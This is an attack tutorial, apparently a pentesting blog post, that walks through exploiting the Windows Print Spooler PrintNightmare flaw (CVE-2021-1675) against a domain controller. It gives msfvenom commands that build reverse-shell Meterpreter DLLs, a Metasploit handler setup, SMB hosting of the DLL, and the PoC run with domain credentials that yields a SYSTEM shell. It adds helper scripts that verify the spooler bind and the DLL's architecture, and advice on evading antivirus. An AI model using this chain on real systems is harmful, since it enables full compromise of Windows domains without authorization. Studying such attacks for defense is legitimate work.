Printer Spooler


Category : Attacks


Windows has a service called the Print Spooler that has exposed numerous vulnerabilities over the years. The latest wave started with an unpatched 0-day proof of concept that was deleted from a tweet but had already spread via GitHub. For that reason, this document explains the most common attacks against the Print Spooler service.

PrintNightmare

Explanation of the vulnerability

The Print Spooler is the Windows service that manages print queues: it receives jobs submitted by users, converts them into a format the printer understands, and sends them when the printer is available. It runs as a system service (spoolsv.exe) under the SYSTEM account, loads printer drivers as DLLs into its own process, and can be reached over RPC by ordinary domain users, which makes it a frequent target of attacks such as the PrintNightmare vulnerability.

How to exploit it

Before trying to exploit the print spooler remotely, we can check whether the target exposes the spooler's RPC interfaces with rpcdump.py, which is part of the impacket package, a set of tools widely used in pentesting. If the output lists MS-RPRN (and MS-PAR), the spooler is reachable over the network; that is a precondition for PrintNightmare, not proof that the host is unpatched.

❯ rpcdump.py @10.10.188.66 | egrep 'MS-RPRN|MS-PAR'
Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol
Protocol: [MS-RPRN]: Print System Remote Protocol
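The same check, scripted. This is an added example and not part of the original post: it parses the output of rpcdump.py for the two spooler interface UUIDs and, optionally, binds to \pipe\spoolss with impacket to confirm the service actually answers (an advertised endpoint alone does not prove the spooler is running). The sample rpcdump output, host name and credentials below are constructed for the example.

```python
import re
import sys

# Interface UUIDs as registered in the MS-RPRN and MS-PAR specifications.
SPOOLER_INTERFACES = {
    "12345678-1234-ABCD-EF00-0123456789AB": "MS-RPRN",
    "76F03F96-CDFD-44FC-A22C-64950A001209": "MS-PAR",
}

# Constructed sample in the shape rpcdump.py prints: one block per endpoint,
# blocks separated by a blank line. Not captured from a real host.
SAMPLE_RPCDUMP = r"""
Protocol: N/A
Provider: N/A
UUID    : 11111111-2222-3333-4444-555555555555 v1.0
Bindings:
          ncacn_np:\\DC01[\pipe\lsass]

Protocol: [MS-RPRN]: Print System Remote Protocol
Provider: spoolsv.exe
UUID    : 12345678-1234-ABCD-EF00-0123456789AB v1.0
Bindings:
          ncacn_ip_tcp:10.10.188.66[49668]
          ncacn_np:\\DC01[\pipe\spoolss]

Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol
Provider: spoolsv.exe
UUID    : 76F03F96-CDFD-44FC-A22C-64950A001209 v1.0
Bindings:
          ncacn_ip_tcp:10.10.188.66[49668]
"""

UUID_RE = re.compile(r"^UUID\s*:\s*([0-9A-Fa-f-]{36})\s+v([\d.]+)", re.M)


def spooler_endpoints(rpcdump_output):
    """Map MS-RPRN / MS-PAR to the bindings rpcdump.py found for them.

    Returns an empty dict when neither spooler interface is advertised.
    """
    found = {}
    for block in re.split(r"\n\s*\n", rpcdump_output.strip()):
        m = UUID_RE.search(block)
        if not m:
            continue
        name = SPOOLER_INTERFACES.get(m.group(1).upper())
        if name is None:
            continue
        found[name] = [ln.strip() for ln in block.splitlines()
                       if ln.strip().startswith("ncacn_")]
    return found


def spooler_reachable(rpcdump_output):
    """True if the host advertises MS-RPRN, the interface PrintNightmare abuses."""
    return "MS-RPRN" in spooler_endpoints(rpcdump_output)


def bind_spoolss(host, username, password, domain=""):
    """Bind to \\pipe\\spoolss over SMB and report whether MS-RPRN accepts it.

    Requires impacket and touches the network, so it is never called by the
    offline parts of this script. Any low-privileged domain account will do.
    """
    from impacket.dcerpc.v5 import rprn, transport  # imported lazily on purpose
    rpctransport = transport.DCERPCTransportFactory(rf"ncacn_np:{host}[\pipe\spoolss]")
    rpctransport.set_credentials(username, password, domain)
    dce = rpctransport.get_dce_rpc()
    dce.connect()
    try:
        dce.bind(rprn.MSRPC_UUID_RPRN)
        return True
    except Exception:
        return False
    finally:
        dce.disconnect()


if __name__ == "__main__":
    # Usage: rpcdump.py @10.10.188.66 > dump.txt && python3 spooler_check.py dump.txt
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_RPCDUMP
    for name, bindings in spooler_endpoints(text).items():
        print(name, "->", ", ".join(bindings))
    print("spooler reachable:", spooler_reachable(text))
```

Run it on a saved rpcdump.py dump, and only call bind_spoolss() once you have credentials for the domain; a successful bind means the spooler is listening, which is all the PoC needs to attempt the driver install.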

The exploit is delivered as a malicious DLL. The PoC abuses the RpcAddPrinterDriverEx call to make the spooler install a "printer driver" from a UNC path we control and load it; because the DLL is loaded into spoolsv.exe, it runs as SYSTEM, and in our case it gives us a reverse shell to the attacking machine. Note that this is not a fileless technique: the spooler copies the DLL into its driver directory on the target (C:\Windows\System32\spool\drivers\x64\3\ on 64-bit hosts), and a raw msfvenom payload like the one below is widely detected by antivirus, so on a hardened target expect to need a custom or obfuscated DLL. To create the malicious DLL I will use "msfvenom". The payload must match the target's architecture (x64 or x86; the spooler of a 64-bit Windows host only loads 64-bit drivers), and we set LHOST and LPORT to the attacker's address and the port where we will start a listener for the callback from the DLL. You can find the IP address of your machine by typing "ifconfig" (or "ip addr"). We will use the following command to create our malicious DLL.

❯ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=443 -f dll -o /home/ghost/Pentesting/Print/PrintMalicious_x64.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of dll file: 9216 bytes
Saved as: /home/ghost/Pentesting/Print/PrintMalicious_x64.dll

And if the target is 32-bit, we would use this payload instead:

❯ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=443 -f dll -o /home/ghost/Pentesting/Print/PrintMalicious_x86.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of dll file: 9216 bytes
Saved as: /home/ghost/Pentesting/Print/PrintMalicious_x86.dll
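Because the spooler silently fails to load a driver of the wrong architecture (or an EXE), it is worth checking the DLL before pushing it. The following pre-flight check is an added example, not part of the original post: it reads the COFF header of the generated DLL, infers the target's architecture from the pDriverPath the PoC reports (an ...\Amd64\... path means a 64-bit spooler, ...\I386\... a 32-bit one), and builds the UNC argument. The stub PE bytes it uses for offline testing are constructed and are not a loadable image; the environment strings are the MS-RPRN names "Windows x64" and "Windows NT x86".

```python
import struct
import sys

IMAGE_FILE_MACHINE_I386 = 0x014C
IMAGE_FILE_MACHINE_AMD64 = 0x8664
IMAGE_FILE_DLL = 0x2000

# MS-RPRN environment names per CPU architecture; the PoC enumerates drivers
# for "Windows x64" on a 64-bit target.
DRIVER_ENVIRONMENT = {
    IMAGE_FILE_MACHINE_I386: "Windows NT x86",
    IMAGE_FILE_MACHINE_AMD64: "Windows x64",
}

# The pDriverPath reported by the PoC run in this post (64-bit spooler).
AMD64_DRIVER_PATH = r"C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL"


def pe_header(data):
    """Return (Machine, Characteristics) from the COFF header of a PE image."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ/PE image")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    (machine,) = struct.unpack_from("<H", data, e_lfanew + 4)
    (characteristics,) = struct.unpack_from("<H", data, e_lfanew + 22)
    return machine, characteristics


def target_machine(driver_path):
    """Infer the spooler's architecture from the pDriverPath the PoC found."""
    p = driver_path.lower()
    if "\\amd64\\" in p:
        return IMAGE_FILE_MACHINE_AMD64
    if "\\i386\\" in p:
        return IMAGE_FILE_MACHINE_I386
    raise ValueError("cannot infer architecture from pDriverPath: " + driver_path)


def driver_matches(data, driver_path):
    """Return (ok, reason): ok is True only if data is a DLL built for the target."""
    machine, chars = pe_header(data)
    if not chars & IMAGE_FILE_DLL:
        return False, "image is an EXE, not a DLL; spoolsv.exe will not load it"
    want = target_machine(driver_path)
    if machine != want:
        have = DRIVER_ENVIRONMENT.get(machine, hex(machine))
        return False, f"DLL is {have}, target needs {DRIVER_ENVIRONMENT[want]}"
    return True, DRIVER_ENVIRONMENT[want]


def unc_driver_path(host, share, filename):
    """Build the UNC argument for the PoC: \\\\host\\share\\file, file name only."""
    if any(c in filename for c in "\\/"):
        raise ValueError("pass only the DLL file name, not a path")
    return f"\\\\{host}\\{share}\\{filename}"


def stub_pe(machine, characteristics=IMAGE_FILE_DLL):
    """Constructed minimal MZ + PE + COFF header for offline tests (not loadable)."""
    hdr = bytearray(0x40)
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x40)  # e_lfanew: PE header follows the DOS header
    coff = struct.pack("<HHIIIHH", machine, 0, 0, 0, 0, 0, characteristics)
    return bytes(hdr) + b"PE\0\0" + coff


if __name__ == "__main__":
    # Usage: python3 driver_check.py PrintMalicious_x64.dll [pDriverPath]
    path = sys.argv[1] if len(sys.argv) > 1 else None
    data = open(path, "rb").read() if path else stub_pe(IMAGE_FILE_MACHINE_AMD64)
    drv = sys.argv[2] if len(sys.argv) > 2 else AMD64_DRIVER_PATH
    ok, why = driver_matches(data, drv)
    print("OK" if ok else "MISMATCH", "-", why)
    print("UNC:", unc_driver_path("10.10.10.10", "share", "PrintMalicious_x64.dll"))
```

Run it against the DLL msfvenom produced and the pDriverPath from a first PoC attempt; a mismatch explains the common "Stage0" failures that are otherwise hard to diagnose from the attacker side.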

Now that we have created our malicious DLL, we start a listener in the Metasploit Framework so that we get the Meterpreter shell back when the DLL is loaded on the target. Follow the steps below; the payload set on the handler must be the same one built into the DLL. Finally, type 'exploit -j' to run the handler as a background job.

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.10.10.10
LHOST => 10.10.10.10
msf6 exploit(multi/handler) > set LPORT 443
LPORT => 443
msf6 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 10.10.10.10:443

Now that the listener is running, we start an SMB server to host the malicious DLL. Before doing that, make sure you have "Impacket" installed on your computer. Impacket is a collection of open-source Python modules, and one of them is smbserver.py, which is the one we will use here. Change to the directory where we saved the DLL, in my case /home/ghost/Pentesting/Print/, and enter the following command. The share name ("share") is the one we will reference in the UNC path later, and "-smb2support" is needed because current Windows versions refuse to talk SMB1.

❯ smbserver.py share . -smb2support
Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

Great, we are now set up to begin exploitation with the CVE-2021-1675 proof of concept (PoC). We pass it the target (in this example the domain controller), valid domain credentials (a low-privileged domain user is enough), and the UNC path to the malicious DLL hosted on our SMB server.

❯ python3 CVE-2021-1675.py NetworkAD-EDU.ENGdepartment.local/jjsmith:wellsaidsecurity143@10.10.220.93 '\\10.10.10.10\share\PrintMalicious_x64.dll'
[*] Connecting to ncacn_np:10.10.220.93[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL
[*] Executing \??\UNC\10.10.10.10\share\PrintMalicious_x64.dll
[*] Try 1...
[*] Stage0: 0
[*] Try 2...
[*] Stage0: 0
[*] Try 3...

The PoC retries the driver install a few times. After a few seconds, if we go back to the listener we started in Metasploit, it shows that a Meterpreter session has opened, so we can now interact with the victim machine through the Meterpreter shell, running as SYSTEM inside the spooler process.